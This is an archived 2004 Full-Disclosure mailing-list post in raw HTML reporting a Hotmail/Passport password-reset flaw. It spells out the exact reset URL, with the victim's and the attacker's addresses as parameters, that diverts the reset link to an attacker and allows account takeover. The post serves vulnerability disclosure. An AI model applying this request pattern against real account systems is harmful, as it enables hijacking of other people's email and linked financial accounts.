[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: [Full-Disclosure] Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability
From: César René Vega García <li_crvgjur1@xxxxxxxxxxx>
Date: Tue, 09 Nov 2004 19:40:08 +0000

<html><div style='background-color:'><DIV>
<DIV>
<DIV class=RTE><EM><FONT face=Arial color=#ffffff size=2><FONT 
color=#000000>:Hotmail &amp; Passport (.NET Accounts) 
Vulnerability<BR><BR>There is a very serious and stupid vulnerability or 
badcoding in Hotmail / Passportâ??s (.NET<BR>Accounts)<BR><BR>I tried sending 
emails several times to Hotmail / Passport contact addresses, but always 
met<BR>with the NLP bots.<BR><BR>I guess I donâ??t need to go in details of how 
cruical and important Hotmail / Passportâ??s<BR>.NET Account passport is to 
anyone.<BR><BR>You name it and they have it, E-Commerce, Credit Card 
processing, Personal Emails, Privacy Issues,<BR>Corporate Espionage, maybe 
stalkers and what not.<BR><BR>It is so simple that it is funny.<BR><BR>All you 
got to do is hit the following in your browser:<BR><BR><A 
href="https://register.passport.net/emailpwdreset.srf?lc=1033&amp;em=modulohio@xxxxxxxxxxx&amp;id=&amp;cb=&amp;prefem=li_crvgjur1@xxxxxxxxxxx&amp;rst=1";>https://register.passport.net/emailpwdreset.srf?lc=1033&am!
 
p;em=modulohio@xxxxxxxxxxx&amp;id=&amp;cb=&amp;prefem=li_crvgjur1@xxxxxxxxxxx&amp;rst=1</A><BR><BR>And
 youâ??ll get an email on attacker@xxxxxxxxxxxx asking you to click on a url 
something 
like<BR>this:<BR><BR>http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&amp;URLNum=0&amp;lc=1033<BR><BR>&gt;From
 that url, you can reset the password and I donâ??t think I need to say 
anything more about<BR>it.<BR><BR>Vulnerability / Flaw discovered : 12th April 
2003<BR>Vendor / Owner notified : Yes (as far as emailing them more than 10 
times is concerned)<BR><BR><BR>Regards<BR>--------<BR>Muhammad Faisal Rauf 
Danka </FONT></FONT></EM></DIV></DIV></DIV></div><br clear=all><hr>T1msn 
Search. Todo lo que buscas ahora más rápido <a 
href="http://g.msn.com/8HMAESMX/2728??PS=47575"; target="_top">Haz clic aquí 
</a> </html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- Re: [Full-Disclosure] Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability
  - From: n3td3v

Prev by Date: [Full-Disclosure] [ GLSA 200411-16 ] zip: Path name buffer overflow
Next by Date: Re: [Full-Disclosure] EEYE: Kerio Personal Firewall Multiple IP Options Denial of Service
Previous by thread: [Full-Disclosure] [ GLSA 200411-16 ] zip: Path name buffer overflow
Next by thread: Re: [Full-Disclosure] Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability
Index(es):
- Date
- Thread